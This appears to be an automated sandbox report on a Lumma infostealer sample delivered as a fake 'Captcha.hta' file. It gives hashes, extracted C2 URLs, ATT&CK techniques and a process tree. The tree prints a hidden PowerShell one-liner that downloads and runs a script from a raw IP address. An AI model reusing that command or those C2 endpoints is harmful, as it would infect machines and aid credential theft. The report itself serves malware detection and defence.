lumma | a5a7a72decc3a1f9bb2e0c39269f9660051a3a40c34f87789e33995b9dd2b9e1

General

Target

Captcha.hta
Size

1KB
MD5

21bd78bbc50aa0b32d6e8d1868e9ad5e
SHA1

8a4278d077fa472fd6e4cbde95e6a3b928eff10b
SHA256

a5a7a72decc3a1f9bb2e0c39269f9660051a3a40c34f87789e33995b9dd2b9e1
SHA512

3d088b7ff90f722223fe2cef2bd65b8df3fdcaa92fe14f46b8c1f2b9ee0c3c1c94cff2ca02acf9619ffa372db4565fc1b576fd553e928ebf6d94238b86eace0e

Score

10^/10

lumma discovery execution stealer

Malware Config

Extracted

Family

lumma

C2

https://impend-differ.biz/api

https://print-vexer.biz/api

https://dare-curbys.biz/api

https://covery-mover.biz/api

https://formy-spill.biz/api

https://dwell-exclaim.biz/api

https://zinc-sneark.biz/api

https://se-blurry.biz/api

Extracted

Family

lumma

C2

https://covery-mover.biz/api

Signatures

Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma

Blocklisted process makes network request 2 IoCs

flow	pid	Process
10	4976	powershell.exe
17	4976	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4976	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	mshta.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4976 set thread context of 1632	4976	powershell.exe	87

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4976	powershell.exe
4976	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4976	powershell.exe

Suspicious use of WriteProcessMemory 22 IoCs

description	pid	Process	procid_target
PID 3748 wrote to memory of 4976	3748	mshta.exe	82
PID 3748 wrote to memory of 4976	3748	mshta.exe	82
PID 3748 wrote to memory of 4976	3748	mshta.exe	82
PID 4976 wrote to memory of 2196	4976	powershell.exe	84
PID 4976 wrote to memory of 2196	4976	powershell.exe	84
PID 4976 wrote to memory of 2196	4976	powershell.exe	84
PID 4976 wrote to memory of 4000	4976	powershell.exe	85
PID 4976 wrote to memory of 4000	4976	powershell.exe	85
PID 4976 wrote to memory of 4000	4976	powershell.exe	85
PID 4000 wrote to memory of 1928	4000	csc.exe	86
PID 4000 wrote to memory of 1928	4000	csc.exe	86
PID 4000 wrote to memory of 1928	4000	csc.exe	86
PID 4976 wrote to memory of 1632	4976	powershell.exe	87
PID 4976 wrote to memory of 1632	4976	powershell.exe	87
PID 4976 wrote to memory of 1632	4976	powershell.exe	87
PID 4976 wrote to memory of 1632	4976	powershell.exe	87
PID 4976 wrote to memory of 1632	4976	powershell.exe	87
PID 4976 wrote to memory of 1632	4976	powershell.exe	87
PID 4976 wrote to memory of 1632	4976	powershell.exe	87
PID 4976 wrote to memory of 1632	4976	powershell.exe	87
PID 4976 wrote to memory of 1632	4976	powershell.exe	87
PID 4976 wrote to memory of 1632	4976	powershell.exe	87

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Captcha.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3748
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4976
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5qdxrpte\5qdxrpte.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2196
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ga2mfthl\ga2mfthl.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4000
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD968.tmp" "c:\Users\Admin\AppData\Local\Temp\ga2mfthl\CSC13CBB517CBD94F388BA81B51D57A1F18.TMP"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1928
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1632

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESD968.tmp

Filesize
1KB

MD5
9b81916cf698f4c7c9d5c373300befd5

SHA1
4404d9b301373369bcbe95ba74a20a960ae5f59e

SHA256
ed6fb36d1b61fcf87d53eedd4c05107d6f45a6600ecaecf5e25773a52c0cb41f

SHA512
ef703cb113aa84a58ad685cbfdb368e4d128f9551765aa6d3042bc0e82f1d0b65a8bc54ab0b554a032449c069ccf5a9cda094eed7a43c992c26477a3d06b547a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qhelldzt.duv.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ga2mfthl\ga2mfthl.dll

Filesize
8KB

MD5
a5d73ebc0e2f9d613726555b32e8d060

SHA1
f040061310443da650fad0585991c230f7e54b75

SHA256
d4397afae56d3221665f1ee4d5bb90e23dfe73fec2d51479a873a886f7af06e7

SHA512
9da1acf93856e993ef0c6beaa848e6673a1063b6f2f98ad446dfeb4ca39047d46793c99bb63296dc7b0a4e30b88c568aaf4364ae492984372ccfc5623ba933e3

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\5qdxrpte\5qdxrpte.0.cs

Filesize
484B

MD5
fefba9c7ae0d93708317c3d74298f4ff

SHA1
92fb7cd5fa4b3e885906e7863783d899ed777feb

SHA256
7e7246d00754eb5c87a1296d7031fa401c217f74e3faa4954e5d1e0b63de0ec6

SHA512
5cc1e0f1974cad1b34463c2edfc49fe637e57ee78c441cce6aca3c0b11c2c3876a8d0bb39b38be0af434b5122f5015aad4597fee44f80624abd9bc56266c0b9b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\5qdxrpte\5qdxrpte.cmdline

Filesize
369B

MD5
e2d92d625ec079628d84bcaeebc17331

SHA1
928973bca6c82e18f9cafac7d32f98fd585b65d9

SHA256
2617a9509525cc06a45154958bd0cb66118cc848b015686c8bfa8c24d8e1889d

SHA512
96bca3c185c4b2f8ef71c1181f7ed43d9682e446dc40c1fbc173475a9a60ca127acd885f5f1622bd963906cdced1f7ad40045fc9405c17ed9c2c44b58f7190a8

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ga2mfthl\CSC13CBB517CBD94F388BA81B51D57A1F18.TMP

Filesize
652B

MD5
d27c0e821b70e104cf3235de24c7eb00

SHA1
ac6df86ceb822b120f6ebca3961500fe3b7f42ec

SHA256
d58b7ec7ecda93fd6837b81c07ada0e5a4e3716defafca1d99cfd16ae8bd49cd

SHA512
3a1a2c2315e7f6925b7456512e0051d6d1babd0a3f5a7dfb77534503075e4512df620c8b76b5de15381193618b21c01c07586b561b2a37293ac17ee3dd9f894d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ga2mfthl\ga2mfthl.0.cs

Filesize
10KB

MD5
b022c6fe4494666c8337a975d175c726

SHA1
8197d4a993e7547d19d7b067b4d28ebe48329793

SHA256
d02016a307b3e8da1a80c29551d44c17358910816e992bc1b53da006d62dd56a

SHA512
df670235e87b1ee957086be88731b458c28629e65e052276dd543be273030986a7e5c67fa83587f68ec06fa0f33b0c3f1f041c2d06073709b340f96c3884f2b9

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ga2mfthl\ga2mfthl.cmdline

Filesize
204B

MD5
907fcb46be66bd2cf4d100cb3f14270c

SHA1
f3db88252c1235846a151cfc42b57b8bcf6902a4

SHA256
76e51c9d2474f7e8deb4bf3d7be3532593574126c806beae4c0b63bf18b86296

SHA512
0507a3ee46bccbea94518d54ccf4e1c88a8c9615f3ffa0289364737ed0e35e4098d73a704072a1111e38b7eb6c441c0e62b0d699b03e25a7870697c08f2f38ca

Download Submit
memory/1632-47-0x0000000000400000-0x0000000000457000-memory.dmp

Filesize
348KB

Download
memory/1632-49-0x0000000000400000-0x0000000000457000-memory.dmp

Filesize
348KB

Download
memory/1632-46-0x0000000000400000-0x0000000000457000-memory.dmp

Filesize
348KB

Download
memory/4976-8-0x0000000005710000-0x0000000005776000-memory.dmp

Filesize
408KB

Download
memory/4976-9-0x0000000005780000-0x00000000057E6000-memory.dmp

Filesize
408KB

Download
memory/4976-23-0x0000000006E30000-0x0000000006E4A000-memory.dmp

Filesize
104KB

Download
memory/4976-21-0x00000000060F0000-0x000000000613C000-memory.dmp

Filesize
304KB

Download
memory/4976-20-0x0000000005D80000-0x0000000005D9E000-memory.dmp

Filesize
120KB

Download
memory/4976-31-0x00000000073E0000-0x00000000073F2000-memory.dmp

Filesize
72KB

Download
memory/4976-19-0x00000000057F0000-0x0000000005B44000-memory.dmp

Filesize
3.3MB

Download
memory/4976-22-0x0000000007480000-0x0000000007AFA000-memory.dmp

Filesize
6.5MB

Download
memory/4976-2-0x000000007488E000-0x000000007488F000-memory.dmp

Filesize
4KB

Download
memory/4976-7-0x0000000074880000-0x0000000075030000-memory.dmp

Filesize
7.7MB

Download
memory/4976-6-0x0000000004EF0000-0x0000000004F12000-memory.dmp

Filesize
136KB

Download
memory/4976-44-0x0000000004B10000-0x0000000004B18000-memory.dmp

Filesize
32KB

Download
memory/4976-4-0x0000000074880000-0x0000000075030000-memory.dmp

Filesize
7.7MB

Download
memory/4976-5-0x0000000005070000-0x0000000005698000-memory.dmp

Filesize
6.2MB

Download
memory/4976-3-0x00000000028D0000-0x0000000002906000-memory.dmp

Filesize
216KB

Download
memory/4976-52-0x0000000074880000-0x0000000075030000-memory.dmp

Filesize
7.7MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads